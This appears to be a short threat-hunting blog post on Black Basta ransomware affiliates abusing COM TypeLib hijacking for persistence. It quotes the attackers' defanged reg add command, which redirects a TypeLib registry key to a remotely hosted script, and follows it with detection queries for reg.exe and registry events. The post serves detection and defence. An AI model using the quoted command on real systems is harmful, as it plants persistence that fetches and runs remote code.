111. Black Basta Affiliates Use TypeLib Hijacking Technique

Hello everyone! Let's talk about not so common persistence techniques. According to ReliaQuest report, Black Basta ransomware affiliates started to use a novel persistence method that involved hijacking the Component Object Model Type Library.

In TypeLib hijacking, attackers modify registry entries to redirect legitimate COM objects to malicious scripts or files.

The threat actors executed the following command:

reg add ""HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64"" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /f

For example, we can search for abusing reg.exe:

event_type: "processcreatewin"

AND

proc_file_name: "reg.exe"

AND

cmdline: ("TypeLib" AND "script")

We can also hunt for registry modification events:

event_type: "registryvaluesetwin"

AND

reg_key_path: "TypeLib"

AND

reg_value_data: "script"

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge